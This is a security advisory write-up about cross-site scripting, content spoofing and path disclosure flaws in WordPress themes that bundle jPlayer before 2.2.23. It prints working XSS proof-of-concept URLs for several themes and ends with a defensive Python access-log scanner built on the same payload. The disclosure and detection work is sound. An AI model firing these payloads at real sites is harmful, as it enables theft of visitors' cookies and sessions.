Vulnerabilities found in multiple themes for WordPress with jPlayer, issue fixed


Multiple vulnerabilities were found in themes designed for WordPress that use jPlayer. Thousands of WordPress themes use jPlayer, and some websites place Jplayer.swf in folders other than plugins and themes. The vulnerabilities expose these themes and websites to cross-site scripting, content spoofing and full path disclosure.

A simple Google search puts the number of affected themes at 313,000, and for Jplayer the number is 32,000. All versions of the following products are affected:

Studiozen, Photocrati, Music, Imperial Fairytale and Feather12 themes.

These findings were posted on Seclist. The researcher, named MustLive, also said,

Vulnerabilities are in jPlayer versions before 2.2.23. Version 2.2.23 and the last released version 2.3.0 are not vulnerable to the mentioned XSS, except CS via JS and XSS via JS callbacks.

The affected products (the Studiozen, Photocrati, Music, Imperial Fairytale and Feather12 themes) can be exploited through the XSS vulnerability:

Studiozen:
http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Photocrati:
http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Music:
http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
Imperial Fairytale:
Feather12:
http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing:

Any audio or video content can be inserted from external sources using cross-site scripting or script. This requires an HTML injection vulnerability at the site. So if the website owner has not protected the website against HTML injection, the website may be exploited using content spoofing.

On WP themes, the researcher said,

All mentioned themes have FPD vulnerabilities in php-files (in index.php and others), which is typical for WP themes.

Full Path Disclosure (FPD) reveals the full operating path of a vulnerable script. The FPD bug is triggered by injecting unexpected characters, which cause the script to return an error message that includes the full operating path of the vulnerable script.

The developer of Jplayer has released updates but has not completely patched version 2.3.0, so themes using Jplayer 2.3.0 are still exposed to the XSS vulnerability.
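
Site owners can check their web server access logs for requests of the kind listed above. The following is an added example, not code from the advisory or from jPlayer: it flags requests to any Jplayer.swf path, in a theme folder or elsewhere, whose id or jQuery parameter is not a plain identifier. The allow-list pattern and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format request field: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Flashvars the page shows being abused in Jplayer.swf.
WATCHED_PARAMS = {"id", "jquery"}
# Assumption: legitimate values are plain identifiers such as
# "jquery_jplayer_1" or "jQuery"; anything else is suspicious.
SAFE_VALUE_RE = re.compile(r"[A-Za-z0-9_.$-]{1,64}")


def suspicious_params(target):
    """Return [(param, value)] for unsafe flashvars in a Jplayer.swf request."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/jplayer.swf"):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %27 and %22 are seen as quotes.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in WATCHED_PARAMS and not SAFE_VALUE_RE.fullmatch(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Yield (line_number, path, hits) for each log line that trips the check."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            yield number, urlsplit(match.group(1)).path, hits


# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/music/js/Jplayer.swf?id=jquery_jplayer_1&jQuery=jQuery HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /media/player/Jplayer.swf?jQuery=)}catch(e){} HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {path} -> {hits}")
```

A hit only shows that such a request was made; whether it had any effect depends on the jPlayer version the site serves.
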
Source: Seclist
 

 
